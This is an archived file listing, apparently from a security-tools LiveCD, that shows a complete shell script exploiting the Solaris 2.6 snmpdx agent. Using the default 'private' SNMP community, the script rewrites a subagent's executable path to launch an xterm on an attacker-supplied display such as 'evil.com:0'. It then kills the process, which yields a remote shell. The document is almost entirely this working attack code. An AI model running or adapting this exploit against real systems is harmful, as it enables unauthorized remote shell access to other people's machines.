home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
system
/
solaris
/
remote
/
snmpx.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
2005-02-12
|
864b
|
24 lines
#!/bin/sh
#
# Solaris 2.6 snmpdx private and lame remote exploit by acz@hert.org
#
if [ $# -ne 2 ]; then
echo "Usage: $0 <target> <evil_display>"
echo " eg. $0 example.com evil.com:0"
exit
fi
export TARGET=$1
export EVIL_DISPLAY=$2
PID=`snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.9.2|awk '{print $3}'`
echo Process id of 2nd subagent: $PID $TARGET
snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2
echo "Replacing Executable Path for 2nd subagent"
eval 'snmpset 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2 s "/usr/openwin/bin/xterm -display $EVIL_DISPLAY -ut"'
echo "Sending signal -KILL to process id $PID on $TARGET"
snmpset 2>/dev/null $TARGET 'all private' .1.3.6.1.4.1.42.3.12.1.1.11.$PID i 9
echo "Wait for xterm now"
# www.hack.co.za [2000]#